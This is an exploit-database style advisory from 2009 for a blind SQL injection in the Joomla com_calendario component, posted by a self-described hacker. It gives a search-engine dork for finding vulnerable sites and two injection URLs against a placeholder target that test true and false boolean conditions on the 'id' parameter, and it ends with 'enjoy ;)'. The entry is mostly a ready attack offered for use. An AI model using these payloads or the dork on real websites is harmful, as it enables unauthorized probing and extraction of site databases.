[] NeoSense

Joomla! Component com_calendario - Blind SQL Injection

Author: Mr.tro0oqy
type: webapps
platform: php
port: 
date_added: 2009-12-27 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Joomla Component com_calendario Blind SQL injection Vulnerability

author : Mr.tro0oqy --> yemeni hacker

email : t.4@windowslive.com

dork: inurl:index.php?option=com_calendario


exp :

http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true


http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false


enjoy ;)